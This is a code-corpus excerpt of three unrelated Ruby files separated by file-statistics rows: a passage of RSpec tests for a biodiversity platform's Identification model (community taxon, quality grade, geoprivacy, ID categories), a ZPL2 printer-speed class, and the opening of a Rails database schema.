o = make_research_grade_candidate_observation(taxon: Taxon.make!(rank: Taxon::SPECIES))
expect( o.quality_grade ).to eq Observation::NEEDS_ID
i = Identification.make!(:observation => o, :taxon => o.taxon)
o.reload
expect( o.quality_grade ).to eq Observation::RESEARCH_GRADE
end
it "should trigger setting a taxon photo if obs became research grade" do
t = Taxon.make!( rank: Taxon::SPECIES )
o = make_research_grade_candidate_observation
expect( o ).not_to be_research_grade
expect( t.photos.size ).to eq 0
without_delay do
Identification.make!( observation: o, taxon: t )
Identification.make!( observation: o, taxon: t )
end
o.reload
t.reload
expect( o ).to be_research_grade
expect( t.photos.size ).to eq 1
end
it "should not trigger setting a taxon photo if obs was already research grade" do
o = without_delay { make_research_grade_observation }
o.taxon.taxon_photos.delete_all
expect( o.taxon.photos.count ).to eq 0
i = without_delay { Identification.make!( observation: o, taxon: o.taxon ) }
o.reload
expect( o.taxon.photos.count ).to eq 0
end
it "should not trigger setting a taxon photo if taxon already has a photo" do
t = Taxon.make!( rank: Taxon::SPECIES )
t.photos << LocalPhoto.make!
o = make_research_grade_candidate_observation
expect( o ).not_to be_research_grade
expect( t.photos.size ).to eq 1
without_delay do
Identification.make!( observation: o, taxon: t )
Identification.make!( observation: o, taxon: t )
end
o.reload
t.reload
expect( o ).to be_research_grade
expect( t.photos.size ).to eq 1
end
it "should update observation quality grade after disagreement when observer opts out of CID" do
g = create :taxon, :as_genus
s1 = create :taxon, :as_species, parent: g
s2 = create :taxon, :as_species, parent: g
o = make_research_grade_observation( prefers_community_taxon: false, taxon: s1 )
expect( o ).to be_research_grade
2.times { create( :identification, observation: o, taxon: s2 ) }
o.reload
expect( o ).not_to be_research_grade
o.owners_identification.destroy
o.reload
expect( o.owners_identification ).to be_blank
create( :identification, user: o.user, observation: o, taxon: s2 )
o.reload
expect( o ).to be_research_grade
end
it "should obscure the observation's coordinates if the taxon is threatened" do
o = Observation.make!(:latitude => 1, :longitude => 1)
expect(o).not_to be_coordinates_obscured
i = Identification.make!(:taxon => make_threatened_taxon, :observation => o, :user => o.user)
o.reload
expect(o).to be_coordinates_obscured
end
it "should set the observation's community taxon" do
t = Taxon.make!
o = Observation.make!(:taxon => t)
expect(o.community_taxon).to be_blank
i = Identification.make!(:observation => o, :taxon => t)
o.reload
expect(o.community_taxon).to eq(t)
end
it "should touch the observation" do
o = Observation.make!
updated_at_was = o.updated_at
op = Identification.make!(:observation => o, :user => o.user)
o.reload
expect(updated_at_was).to be < o.updated_at
end
it "creates observation reviews if they dont exist" do
o = Observation.make!
expect(o.observation_reviews.count).to eq 0
Identification.make!(observation: o, user: o.user)
o.reload
expect(o.observation_reviews.count).to eq 1
end
it "updates existing reviews" do
o = Observation.make!
r = ObservationReview.make!(observation: o, user: o.user, updated_at: 1.day.ago)
Identification.make!(observation: o, user: o.user)
o.reload
expect( o.observation_reviews.first ).to eq r
expect( o.observation_reviews.first.updated_at ).to be > r.updated_at
end
it "marks existing unreviewed reviews as reviewed" do
o = Observation.make!
r = ObservationReview.make!( observation: o, user: o.user )
r.update_attributes( reviewed: false )
Identification.make!( observation: o, user: o.user )
o.reload
expect( o.observation_reviews.first ).to eq r
expect( o.observation_reviews.first ).to be_reviewed
end
it "should set curator_identification_id on project observations to last current identification" do
o = Observation.make!
p = Project.make!
pu = ProjectUser.make!(:user => o.user, :project => p)
po = ProjectObservation.make!(:observation => o, :project => p)
i1 = Identification.make!(:user => p.user, :observation => o)
Delayed::Worker.new.work_off
po.reload
expect(po.curator_identification_id).to eq i1.id
end
it "should set the observation's taxon_geoprivacy if taxon was threatened" do
t = make_threatened_taxon
o = Observation.make!
expect( o.taxon_geoprivacy ).to be_blank
i = Identification.make!( taxon: t, observation: o )
o.reload
expect( o.taxon_geoprivacy ).to eq Observation::OBSCURED
end
describe "with indexing" do
elastic_models( Observation, Identification )
it "should make older identifications not current in elasticsearch" do
old_ident = Identification.make!
without_delay do
Identification.make!( observation: old_ident.observation, user: old_ident.user )
end
es_response = Identification.elastic_search( where: { id: old_ident.id } ).results.results.first
expect( es_response.id.to_s ).to eq old_ident.id.to_s
old_ident.reload
expect( old_ident ).not_to be_current
expect( es_response.current ).to be false
end
describe "user counter cache" do
it "should incremement for an ident on someone else's observation, with delay" do
taxon = Taxon.make!
obs = Observation.make!(taxon: taxon)
user = User.make!
Delayed::Job.destroy_all
expect( Delayed::Job.count ).to eq 0
expect( user.identifications_count ).to eq 0
Identification.make!(user: user, observation: obs, taxon: taxon)
expect( Delayed::Job.count ).to be > 1
user.reload
expect( user.identifications_count ).to eq 0
Delayed::Worker.new.work_off
user.reload
expect( user.identifications_count ).to eq 1
end
it "should NOT incremement for an ident on one's OWN observation" do
user = User.make!
obs = Observation.make!(user: user)
expect {
without_delay{ Identification.make!(user: user, observation: obs) }
}.to_not change(user, :identifications_count)
end
end
end
end
end
describe Identification, "updating" do
it "should not change current status of other identifications" do
i1 = Identification.make!
i2 = Identification.make!(:observation => i1.observation, :user => i1.user)
i1.reload
i2.reload
expect(i1).not_to be_current
expect(i2).to be_current
i1.update_attributes(:body => "foo")
i1.reload
i2.reload
expect(i1).not_to be_current
expect(i2).to be_current
end
describe "observation taxon_geoprivacy" do
it "should change if becomes current" do
threatened = make_threatened_taxon( rank: Taxon::SPECIES )
not_threatened = Taxon.make!( rank: Taxon::SPECIES )
o = Observation.make!( taxon: threatened )
i1 = o.identifications.first
o.reload
expect( o.taxon_geoprivacy ).to eq Observation::OBSCURED
i2 = Identification.make!( user: i1.user, observation: o, taxon: not_threatened )
o.reload
expect( o.taxon_geoprivacy ).to be_blank
i1.reload
i1.update_attributes( current: true )
o.reload
expect( o.taxon_geoprivacy ).to eq Observation::OBSCURED
end
end
end
describe Identification, "deletion" do
it "should remove the taxon associated with the observation if it's the observer's identification and obs does not prefers_community_taxon" do
observation = Observation.make!( taxon: Taxon.make!, prefers_community_taxon: false )
identification = Identification.make!( observation: observation, taxon: observation.taxon )
expect( observation.taxon ).not_to be_blank
expect( observation ).to be_valid
expect( observation.identifications.length ).to be >= 1
doomed_ident = observation.identifications.select do |ident|
ident.user_id == observation.user_id
end.first
expect( doomed_ident.user_id ).to eq observation.user_id
doomed_ident.destroy
observation.reload
expect( observation.taxon_id ).to be_blank
end
it "should NOT remove the taxon associated with the observation if it's the observer's identification and obs prefers_community_taxon " do
observation_prefers_community_taxon = Observation.make!( taxon: Taxon.make! )
identification_prefers_community_taxon = Identification.make!(
observation: observation_prefers_community_taxon,
taxon: observation_prefers_community_taxon.taxon
)
expect( observation_prefers_community_taxon.taxon ).not_to be_nil
expect( observation_prefers_community_taxon ).to be_valid
observation_prefers_community_taxon.reload
expect( observation_prefers_community_taxon.identifications.length ).to be >= 1
doomed_ident = observation_prefers_community_taxon.identifications.select do |ident|
ident.user_id == observation_prefers_community_taxon.user_id
end.first
expect( doomed_ident.user_id ).to eq observation_prefers_community_taxon.user_id
doomed_ident.destroy
observation_prefers_community_taxon.reload
expect( observation_prefers_community_taxon.taxon_id ).not_to be_nil
end
it "should decrement the observation's num_identification_agreements if this was an agreement" do
o = Observation.make!( taxon: Taxon.make! )
i = Identification.make!( observation: o, taxon: o.taxon )
expect( o.num_identification_agreements ).to eq 1
i.destroy
o.reload
expect( o.num_identification_agreements ).to eq 0
end
it "should decrement the observations num_identification_disagreements if this was a disagreement" do
o = Observation.make!( taxon: Taxon.make! )
ident = Identification.make!( observation: o )
o.reload
expect( o.num_identification_disagreements ).to be >= 1
num_identification_disagreements = o.num_identification_disagreements
ident.destroy
o.reload
expect( o.num_identification_disagreements ).to eq num_identification_disagreements - 1
end
it "should decremement the counter cache in users for an ident on someone else's observation" do
i = Identification.make!
expect( i.user ).not_to be i.observation.user
old_count = i.user.identifications_count
user = i.user
i.destroy
user.reload
expect( user.identifications_count ).to eq 0
end
it "should NOT decremement the counter cache in users for an ident on one's OWN observation" do
new_observation = Observation.make!( taxon: Taxon.make! )
new_observation.reload
owners_ident = new_observation.identifications.select do |ident|
ident.user_id == new_observation.user_id
end.first
user = new_observation.user
old_count = user.identifications_count
owners_ident.destroy
user.reload
expect(user.identifications_count).to eq old_count
end
it "should update observation quality_grade" do
o = make_research_grade_observation
expect(o.quality_grade).to eq Observation::RESEARCH_GRADE
o.identifications.last.destroy
o.reload
expect(o.quality_grade).to eq Observation::NEEDS_ID
end
it "should update observation quality_grade if made by another user" do
o = make_research_grade_observation
expect(o.quality_grade).to eq Observation::RESEARCH_GRADE
o.identifications.each {|ident| ident.destroy if ident.user_id != o.user_id}
o.reload
expect(o.quality_grade).to eq Observation::NEEDS_ID
end
it "should not queue a job to update project lists if owners ident" do
o = make_research_grade_observation
Delayed::Job.delete_all
stamp = Time.now
o.owners_identification.destroy
Delayed::Job.delete_all
Identification.make!(:user => o.user, :observation => o, :taxon => Taxon.make!)
jobs = Delayed::Job.where("created_at >= ?", stamp)
pattern = /ProjectList.*refresh_with_observation/m
job = jobs.detect{|j| j.handler =~ pattern}
expect(job).to be_blank
# puts job.handler.inspect
end
it "should queue a job to update check lists if changed from research grade" do
o = make_research_grade_observation
Delayed::Job.delete_all
stamp = Time.now
o.identifications.by(o.user).first.destroy
jobs = Delayed::Job.where("created_at >= ?", stamp)
pattern = /CheckList.*refresh_with_observation/m
job = jobs.detect{|j| j.handler =~ pattern}
expect(job).not_to be_blank
# puts job.handler.inspect
end
it "should queue a job to update check lists if research grade" do
o = make_research_grade_observation
o.identifications.each {|ident| ident.destroy if ident.user_id != o.user_id}
o.reload
expect(o.quality_grade).to eq Observation::NEEDS_ID
stamp = Time.now
Delayed::Job.delete_all
Identification.make!(:taxon => o.taxon, :observation => o)
o.reload
expect(o.quality_grade).to eq Observation::RESEARCH_GRADE
jobs = Delayed::Job.where("created_at >= ?", stamp)
pattern = /CheckList.*refresh_with_observation/m
job = jobs.detect{|j| j.handler =~ pattern}
expect(job).not_to be_blank
# puts job.handler.inspect
end
it "should nilify curator_identification_id on project observations if no other current identification" do
o = Observation.make!
p = Project.make!
pu = ProjectUser.make!(:user => o.user, :project => p)
po = ProjectObservation.make!(:observation => o, :project => p)
i = Identification.make!(:user => p.user, :observation => o)
Identification.run_update_curator_identification(i)
po.reload
expect(po.curator_identification).not_to be_blank
expect(po.curator_identification_id).to eq i.id
i.destroy
po.reload
expect(po.curator_identification_id).to be_blank
end
it "should set curator_identification_id on project observations to last current identification" do
o = Observation.make!
p = Project.make!
pu = ProjectUser.make!(:user => o.user, :project => p)
po = ProjectObservation.make!(:observation => o, :project => p)
i1 = Identification.make!(:user => p.user, :observation => o)
Identification.run_update_curator_identification(i1)
i2 = Identification.make!(:user => p.user, :observation => o)
Identification.run_update_curator_identification(i2)
po.reload
expect(po.curator_identification_id).to eq i2.id
i2.destroy
Identification.run_revisit_curator_identification(o.id, i2.user_id)
po.reload
expect(po.curator_identification_id).to eq i1.id
end
it "should set the user's last identification as current" do
ident1 = Identification.make!
ident2 = Identification.make!(:observation => ident1.observation, :user => ident1.user)
ident3 = Identification.make!(:observation => ident1.observation, :user => ident1.user)
ident2.reload
expect(ident2).not_to be_current
ident3.destroy
ident2.reload
expect(ident2).to be_current
ident1.reload
expect(ident1).not_to be_current
end
it "should set observation taxon to that of last current ident for owner" do
o = Observation.make!(:taxon => Taxon.make!)
ident1 = o.owners_identification
ident2 = Identification.make!(:observation => o, :user => o.user)
ident3 = Identification.make!(:observation => o, :user => o.user)
o.reload
expect(o.taxon_id).to eq(ident3.taxon_id)
ident3.destroy
o.reload
expect(o.taxon_id).to eq(ident2.taxon_id)
end
it "should set the observation's community taxon if remaining identifications" do
load_test_taxa
o = Observation.make!(:taxon => @Calypte_anna)
expect(o.community_taxon).to be_blank
i1 = Identification.make!(:observation => o, :taxon => @Calypte_anna)
i3 = Identification.make!(:observation => o, :taxon => @Calypte_anna)
i2 = Identification.make!(:observation => o, :taxon => @Pseudacris_regilla)
o.reload
expect(o.community_taxon).to eq(@Calypte_anna)
i1.destroy
o.reload
expect(o.community_taxon).to eq(@Chordata) # consensus
end
it "should remove the observation's community taxon if no more identifications" do
o = Observation.make!( taxon: Taxon.make! )
i = Identification.make!( observation: o, taxon: o.taxon )
o.reload
expect( o.community_taxon ).to eq o.taxon
i.destroy
o.reload
expect( o.community_taxon ).to be_blank
end
it "should remove the observation.taxon if there are no more identifications" do
o = Observation.make!
i = Identification.make!( observation: o )
expect( o.taxon ).to eq i.taxon
i.destroy
o.reload
expect( o.taxon ).to be_blank
end
it "destroys automatically created reviews" do
o = Observation.make!
i = Identification.make!(observation: o, user: o.user)
expect(o.observation_reviews.count).to eq 1
i.destroy
o.reload
expect(o.observation_reviews.count).to eq 0
end
it "does not destroy user created reviews" do
o = Observation.make!
i = Identification.make!(observation: o, user: o.user)
o.observation_reviews.destroy_all
r = ObservationReview.make!(observation: o, user: o.user, user_added: true)
expect(o.observation_reviews.count).to eq 1
i.destroy
o.reload
expect(o.observation_reviews.count).to eq 1
end
end
describe Identification, "captive" do
elastic_models( Observation, Identification )
it "should vote yes on the wild quality metric if 1" do
i = Identification.make!(:captive_flag => "1")
o = i.observation
expect(o.quality_metrics).not_to be_blank
expect(o.quality_metrics.first.user).to eq(i.user)
expect(o.quality_metrics.first).not_to be_agree
end
it "should vote no on the wild quality metric if 0 and metric exists" do
i = Identification.make!(:captive_flag => "1")
o = i.observation
expect(o.quality_metrics).not_to be_blank
i.update_attributes(:captive_flag => "0")
o.reload
expect(o.quality_metrics.first).not_to be_agree
end
it "should not alter quality metrics if nil" do
i = Identification.make!(:captive_flag => nil)
o = i.observation
expect(o.quality_metrics).to be_blank
end
it "should not alter quality metrics if 0 and not metrics exist" do
i = Identification.make!(:captive_flag => "0")
o = i.observation
expect(o.quality_metrics).to be_blank
end
end
describe Identification do
elastic_models( Observation, Identification )
it { is_expected.to belong_to :user }
it { is_expected.to belong_to :taxon_change }
it { is_expected.to belong_to(:previous_observation_taxon).class_name "Taxon" }
it { is_expected.to have_many(:project_observations).with_foreign_key(:curator_identification_id).dependent :nullify }
it { is_expected.to validate_presence_of :observation }
it { is_expected.to validate_presence_of :user }
it { is_expected.to validate_presence_of(:taxon).with_message "for an ID must be something we recognize" }
it { is_expected.to validate_length_of(:body).is_at_least(0).is_at_most(Comment::MAX_LENGTH).allow_blank.on :create }
describe "mentions" do
before { enable_has_subscribers }
after { disable_has_subscribers }
it "knows what users have been mentioned" do
u = User.make!
i = Identification.make!(body: "hey @#{ u.login }")
expect( i.mentioned_users ).to eq [ u ]
end
it "generates mention updates" do
u = User.make!
expect( UpdateAction.unviewed_by_user_from_query(u.id, notification: "mention") ).to eq false
i = Identification.make!(body: "hey @#{ u.login }")
expect( UpdateAction.unviewed_by_user_from_query(u.id, notification: "mention") ).to eq true
end
end
describe "run_update_curator_identification" do
it "indexes the observation in elasticsearch" do
o = Observation.make!
p = Project.make!
pu = ProjectUser.make!(user: o.user, project: p)
po = ProjectObservation.make!(observation: o, project: p)
i = Identification.make!(user: p.user, observation: o)
expect( Observation.page_of_results(project_id: p.id, pcid: true).
total_entries ).to eq 0
Identification.run_update_curator_identification(i)
expect( Observation.page_of_results(project_id: p.id, pcid: true).
total_entries ).to eq 1
end
end
end
describe Identification, "category" do
let( :o ) { Observation.make! }
let(:parent) { Taxon.make!( rank: Taxon::GENUS ) }
let(:child) { Taxon.make!( rank: Taxon::SPECIES, parent: parent ) }
describe "should be improving when" do
it "is the first that matches the community ID among several IDs" do
i1 = Identification.make!( observation: o )
i2 = Identification.make!( observation: o, taxon: i1.taxon )
o.reload
i1.reload
expect( o.community_taxon ).to eq i1.taxon
expect( i1.observation.identifications.count ).to eq 2
expect( i1.category ).to eq Identification::IMPROVING
end
it "qualifies but isn't current" do
i1 = Identification.make!( observation: o, taxon: parent )
i2 = Identification.make!( observation: o, taxon: child )
i1.reload
expect( i1.category ).to eq Identification::IMPROVING
i3 = Identification.make!( observation: o, taxon: child, user: i1.user )
i1.reload
expect( i1.category ).to eq Identification::IMPROVING
end
it "is an ancestor of the community taxon and was not added after the first ID of the community taxon" do
i1 = Identification.make!( observation: o, taxon: parent )
i2 = Identification.make!( observation: o, taxon: child )
i3 = Identification.make!( observation: o, taxon: child )
i4 = Identification.make!( observation: o, taxon: child )
o.reload
expect( o.community_taxon ).to eq child
i1.reload
expect( i1.category ).to eq Identification::IMPROVING
end
end
describe "should be maverick when" do
it "the community taxon is not an ancestor" do
i1 = Identification.make!( observation: o )
i2 = Identification.make!( observation: o, taxon: i1.taxon )
i3 = Identification.make!( observation: o )
i3.reload
expect( i3.category ).to eq Identification::MAVERICK
end
end
describe "should be leading when" do
it "is the only ID" do
i = Identification.make!
expect( i.category ).to eq Identification::LEADING
end
it "has a taxon that is a descendant of the community taxon" do
i1 = Identification.make!( observation: o, taxon: parent )
i2 = Identification.make!( observation: o, taxon: parent )
i3 = Identification.make!( observation: o, taxon: child )
expect( i3.category ).to eq Identification::LEADING
end
end
describe "should be supporting when" do
it "matches the community taxon but is not the first to do so" do
i1 = Identification.make!( observation: o )
i2 = Identification.make!( observation: o, taxon: i1.taxon )
expect( i2.category ).to eq Identification::SUPPORTING
end
it "descends from the community taxon but is not the first identification of that taxon" do
i1 = Identification.make!( observation: o, taxon: parent )
i2 = Identification.make!( observation: o, taxon: child )
i3 = Identification.make!( observation: o, taxon: child )
expect( i3.category ).to eq Identification::SUPPORTING
end
end
describe "examples: " do
describe "sequence of IDs along the same ancestry" do
before do
load_test_taxa
@sequence = [
Identification.make!( observation: o, taxon: @Chordata ),
Identification.make!( observation: o, taxon: @Aves ),
Identification.make!( observation: o, taxon: @Calypte ),
Identification.make!( observation: o, taxon: @Calypte_anna )
]
@sequence.each(&:reload)
@sequence
end
it "should all be improving until the community taxon" do
o.reload
expect( o.community_taxon ).to eq @Calypte
expect( @sequence[0].category ).to eq Identification::IMPROVING
expect( @sequence[1].category ).to eq Identification::IMPROVING
end
it "should be improving when it's the first to match the community ID" do
expect( @sequence[2].category ).to eq Identification::IMPROVING
end
it "should end with a leading ID" do
expect( @sequence.last.category ).to eq Identification::LEADING
end
it "should continue to have improving IDs even if the first identifier agrees with the last" do
first = @sequence[0]
i = Identification.make!( observation: o, taxon: @sequence[-1].taxon, user: first.user )
first.reload
@sequence[1].reload
expect( first ).not_to be_current
expect( first.category ).to eq Identification::IMPROVING
expect( @sequence[1].category ).to eq Identification::IMPROVING
end
end
end
describe "after withdrawing and restoring" do
before do
load_test_taxa
u1 = o.user
u2 = User.make!
@sequence = [
Identification.make!( observation: o, taxon: @Calypte_anna, user: u1 ),
Identification.make!( observation: o, taxon: @Calypte, user: u1 ),
Identification.make!( observation: o, taxon: @Calypte, user: u2 ),
Identification.make!( observation: o, taxon: @Calypte_anna, user: u1 ),
]
@sequence.each(&:reload)
o.reload
@sequence
end
it "should not change" do
expect( o.community_taxon ).to eq @Calypte
expect( @sequence[2].category ).to eq Identification::SUPPORTING
@sequence[2].update_attributes( current: false )
expect( @sequence[2] ).not_to be_current
@sequence[2].update_attributes( current: true )
@sequence[2].reload
expect( @sequence[2].category ).to eq Identification::SUPPORTING
end
end
describe "conservative disagreement" do
before do
load_test_taxa
@sequence = [
Identification.make!( observation: o, taxon: @Calypte_anna ),
Identification.make!( observation: o, taxon: @Calypte ),
Identification.make!( observation: o, taxon: @Calypte )
]
@sequence.each(&:reload)
end
it "should consider disagreements that match the community taxon to be improving" do
expect( o.community_taxon ).to eq @Calypte
expect( @sequence[1].category ).to eq Identification::IMPROVING
expect( @sequence[2].category ).to eq Identification::SUPPORTING
end
# it "should consider the identification people disagreed with to be maverick" do
# expect( @sequence[0].category ).to eq Identification::MAVERICK
# end
end
describe "single user redundant identifications" do
before do
load_test_taxa
user = User.make!
@sequence = [
Identification.make!( observation: o, user: user, taxon: @Calypte ),
Identification.make!( observation: o, user: user, taxon: @Calypte )
]
@sequence.each(&:reload)
end
it "should leave the current ID as leading" do
expect( @sequence.last ).to be_current
expect( @sequence.last.category ).to eq Identification::LEADING
end
end
describe "disagreement within a genus" do
before do
load_test_taxa
@sequence = []
@sequence << Identification.make!( observation: o, taxon: @Calypte_anna )
@sequence << Identification.make!( observation: o, taxon: Taxon.make!( parent: @Calypte, rank: Taxon::SPECIES ) )
@sequence << Identification.make!( observation: o, taxon: Taxon.make!( parent: @Calypte, rank: Taxon::SPECIES ) )
@sequence.each(&:reload)
o.reload
expect( o.community_taxon ).to eq @Calypte
end
it "should have all leading IDs" do
expect( @sequence[0].category ).to eq Identification::LEADING
expect( @sequence[1].category ).to eq Identification::LEADING
expect( @sequence[2].category ).to eq Identification::LEADING
end
end
describe "disagreement with revision" do
before do
load_test_taxa
user = User.make!
@sequence = []
@sequence << Identification.make!( observation: o, taxon: @Calypte, user: user )
@sequence << Identification.make!( observation: o, taxon: @Calypte_anna, user: user )
@sequence << Identification.make!( observation: o, taxon: @Calypte )
@sequence.each(&:reload)
o.reload
expect( o.community_taxon ).to eq @Calypte
end
it "should be improving, leading, supporting" do
expect( @sequence[0].category ).to eq Identification::IMPROVING
expect( @sequence[1].category ).to eq Identification::LEADING
expect( @sequence[2].category ).to eq Identification::SUPPORTING
end
end
describe "after taxon swap" do
let(:swap) { make_taxon_swap }
let(:o) { make_research_grade_observation( taxon: swap.input_taxon ) }
it "should be improving, supporting for acitve IDs" do
expect( o.identifications.sort_by(&:id)[0].category ).to eq Identification::IMPROVING
expect( o.identifications.sort_by(&:id)[1].category ).to eq Identification::SUPPORTING
swap.committer = swap.user
swap.commit
Delayed::Worker.new.work_off
o.reload
expect( o.identifications.sort_by(&:id)[2].category ).to eq Identification::IMPROVING
expect( o.identifications.sort_by(&:id)[3].category ).to eq Identification::SUPPORTING
end
end
describe "indexing" do
it "should happen for other idents after new one added" do
i1 = Identification.make!
expect( i1.category ).to eq Identification::LEADING
i2 = Identification.make!( observation: i1.observation, taxon: i1.taxon )
i1.reload
expect( i1.category ).to eq Identification::IMPROVING
es_i1 = Identification.elastic_search( where: { id: i1.id } ).results.results[0]
expect( es_i1.category ).to eq Identification::IMPROVING
end
it "should update this identification's category" do
i1 = Identification.make!
expect( i1.category ).to eq Identification::LEADING
i2 = Identification.make!( observation: i1.observation, taxon: i1.taxon )
i1.reload
i2.reload
expect( i1.category ).to eq Identification::IMPROVING
expect( i2.category ).to eq Identification::SUPPORTING
Delayed::Worker.new.work_off
es_i2 = Identification.elastic_search( where: { id: i2.id } ).results.results[0]
expect( es_i2.category ).to eq Identification::SUPPORTING
end
end
end
describe Identification, "disagreement" do
elastic_models( Observation )
before { load_test_taxa } # Not sure why but these don't seem to pass if I do before(:all)
it "should be nil by default" do
expect( Identification.make! ).not_to be_disagreement
end
it "should automatically set to true on create if the taxon is not a descendant or ancestor of the community taxon" do
o = make_research_grade_observation( taxon: @Calypte_anna)
2.times { Identification.make!( observation: o, taxon: o.taxon ) }
i = Identification.make!( observation: o, taxon: @Pseudacris_regilla )
i.reload
expect( i ).to be_disagreement
end
it "should not be automatically set to true on update if the taxon is not a descendant or ancestor of the community taxon" do
o = make_research_grade_candidate_observation
i = Identification.make!( observation: o, taxon: @Calypte_anna )
4.times { Identification.make!( observation: o, taxon: @Pseudacris_regilla ) }
i.reload
expect( i ).not_to be_disagreement
end
it "should not be automatically set to true if no other identifications are current" do
o = Identification.make!( current: false ).observation
Identification.make!( observation: o, taxon: @Calypte_anna )
o.identifications.each { |i| i.update( current: false ) }
i = Identification.make!( observation: o, taxon: @Pseudacris_regilla )
expect( i ).not_to be_disagreement
end
describe "implicit disagreement" do
it "should set disagreement to true" do
o = Observation.make!( taxon: @Calypte_anna )
Identification.make!( observation: o, taxon: @Calypte_anna )
i = Identification.make!( observation: o, taxon: @Pseudacris_regilla )
expect( i.disagreement ).to eq true
end
it "should not set disagreement previous obs taxon was ungrafted" do
s1 = Taxon.make!( rank: Taxon::SPECIES )
o = Observation.make!( taxon: s1 )
Identification.make!( observation: o, taxon: s1 )
i = Identification.make( observation: o, taxon: @Calypte_anna )
i.save!
expect( i.disagreement ).to be_nil
end
it "should not set disagreement if ident taxon is ungrafted" do
s1 = Taxon.make!( rank: Taxon::SPECIES )
o = Observation.make!( taxon: @Calypte_anna )
Identification.make!( observation: o, taxon: @Calypte_anna )
i = Identification.make!( observation: o, taxon: s1 )
expect( i.disagreement ).to be_nil
end
end
end
describe Identification, "set_previous_observation_taxon" do
elastic_models( Observation )
it "should choose the observation taxon by default" do
o = Observation.make!( taxon: Taxon.make!(:species) )
t = Taxon.make!(:species)
3.times { Identification.make!( observation: o, taxon: t ) }
o.reload
previous_observation_taxon = o.taxon
i = Identification.make!( observation: o )
expect( i.previous_observation_taxon ).to eq previous_observation_taxon
end
it "should choose the probable taxon if the observer has opted out of the community taxon" do
o = Observation.make!( taxon: Taxon.make!(:species), prefers_community_taxon: false )
t = Taxon.make!(:species)
3.times { Identification.make!( observation: o, taxon: t ) }
o.reload
previous_observation_probable_taxon = o.probable_taxon
i = Identification.make!( observation: o )
expect( i.previous_observation_taxon ).to eq previous_observation_probable_taxon
end
it "should set it to the observer's previous identicication taxon if they are the only identifier" do
genus = Taxon.make!( rank: Taxon::GENUS )
species = Taxon.make!( rank: Taxon::SPECIES, parent: genus )
o = Observation.make!( taxon: species )
i1 = o.identifications.first
o.reload
expect( i1 ).to be_persisted
i2 = Identification.make!( observation: o, taxon: genus, user: i1.user )
expect( i2.previous_observation_taxon ).to eq i1.taxon
end
it "should not consider set a previous_observation_taxon to the identification taxon" do
family = Taxon.make!( rank: Taxon::FAMILY )
genus = Taxon.make!( rank: Taxon::GENUS, parent: family, name: "Homo" )
species = Taxon.make!(:species, parent: genus, name: "Homo sapiens" )
o = Observation.make!
i1 = Identification.make!( observation: o, taxon: genus )
i2 = Identification.make!( observation: o, taxon: species )
o.reload
expect( o.probable_taxon ).to eq species
o.reload
i3 = Identification.make!( observation: o, taxon: genus, user: i2.user, disagreement: true )
expect( i3.previous_observation_taxon ).to eq species
end
it "should not happen when you restore a withdrawn ident" do
genus = Taxon.make!( rank: Taxon::GENUS, name: "Genus" )
species1 = Taxon.make!( rank: Taxon::SPECIES, parent: genus, name: "Genus speciesone" )
species2 = Taxon.make!( rank: Taxon::SPECIES, parent: genus, name: "Genus speciestwo" )
o = Observation.make!( taxon: species1 )
i = Identification.make!( observation: o, taxon: genus, disagreement: true )
expect( i.previous_observation_taxon ).to eq species1
expect( o.taxon ).to eq genus
i.update_attributes( current: false )
o.reload
expect( o.taxon ).to eq species1
i2 = Identification.make!( observation: o, user: o.user, taxon: species2 )
expect( o.taxon ).to eq species2
i.update_attributes( current: true )
expect( i.previous_observation_taxon ).to eq species1
end
end
describe Identification, "update_disagreement_identifications_for_taxon" do
elastic_models( Observation )
let(:f) { Taxon.make!( rank: Taxon::FAMILY ) }
let(:g1) { Taxon.make!( rank: Taxon::GENUS, parent: f ) }
let(:g2) { Taxon.make!( rank: Taxon::GENUS, parent: f ) }
let(:s1) { Taxon.make!( rank: Taxon::SPECIES, parent: g1 ) }
describe "should set disagreement to false" do
it "when identification taxon becomes a descendant of the previous observation taxon" do
t = Taxon.make!( rank: Taxon::SPECIES, parent: g2 )
o = Observation.make!( taxon: g1 )
i = Identification.make!( taxon: t, observation: o )
expect( i.previous_observation_taxon ).to eq g1
expect( i ).to be_disagreement
without_delay { t.update_attributes( parent: g1 ) }
i.reload
expect( i ).not_to be_disagreement
end
it "when previous observation taxon becomes an ancestor of the identification taxon" do
t = Taxon.make!( rank: Taxon::GENUS, parent: f )
o = Observation.make!( taxon: t )
i = Identification.make!( taxon: s1, observation: o )
expect( i.previous_observation_taxon ).to eq t
expect( i ).to be_disagreement
without_delay { s1.update_attributes( parent: t ) }
i.reload
expect( i ).not_to be_disagreement
end
end
end
| 40.854436 | 144 | 0.689598 |
ab3fa666195f373826ad49989cd491c0558517b1 | 369 | module Languages
  class Zpl2
    # Builds the ZPL II ^PR (print rate) command from a symbolic speed.
    class Speed
      def initialize(amount)
        set(amount)
      end
      def render
        "^PR#{@amount},D,A"
      end
      private
      # Maps a symbolic speed to its ZPL speed code; unrecognized values leave
      # @amount nil, which renders as "^PR,D,A".
      def set(amount)
        @amount = case amount
        when :slow
          '1'
        when :normal
          'A'
        when :fast
          'C'
        end
      end
    end
  end
end
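# A minimal usage sketch (assumes the class above is loaded):
#
#   Languages::Zpl2::Speed.new(:fast).render #=> "^PRC,D,A"
#   Languages::Zpl2::Speed.new(:slow).render #=> "^PR1,D,A"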
| 14.76 | 30 | 0.449864 |
91c36db7e04678d3498b6cca598445c0fb189b52 | 43,965 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2020_05_18_200713) do
create_table "admin_rates", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "line_item_id"
t.integer "admin_cost"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "affiliations", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.index ["protocol_id"], name: "index_affiliations_on_protocol_id"
end
create_table "alerts", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "alert_type"
t.string "status"
